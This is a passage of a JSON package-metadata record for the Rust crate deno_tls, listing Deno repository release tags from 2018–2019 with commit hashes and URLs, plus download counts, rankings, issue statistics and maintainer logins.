ts"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:30.496Z","dependent_packages_count":15,"downloads":793447,"downloads_period":"total","dependent_repos_count":30,"rankings":{"downloads":4.950065781605071,"dependent_repos_count":5.161531558480407,"dependent_packages_count":2.628430419501982,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":0.9807439301518956,"average":2.296766365480041},"purl":"pkg:cargo/deno_tls","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_tls","docker_dependents_count":19,"docker_downloads_count":18696296,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_tls","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_tls/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek 